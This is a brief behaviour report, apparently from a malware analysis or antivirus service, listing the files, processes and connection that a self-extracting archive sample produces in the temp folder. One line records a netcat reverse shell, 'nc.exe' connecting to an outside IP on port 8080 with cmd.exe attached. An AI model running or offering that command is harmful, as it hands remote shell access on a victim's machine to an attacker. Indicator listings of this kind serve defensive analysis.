Техническая информация
- %TEMP%\RarSFX0\nc.exe 84.135.74.158 8080 -e cmd.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\RarSFX0\123.bat" "
- <SYSTEM32>\wbem\Performance\WmiApRpl_new.ini
- %TEMP%\RarSFX0\123.bat
- %TEMP%\RarSFX0\nc.exe
- %TEMP%\RarSFX0\nc.exe
- %TEMP%\RarSFX0\123.bat
- '84.##5.74.158':8080
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''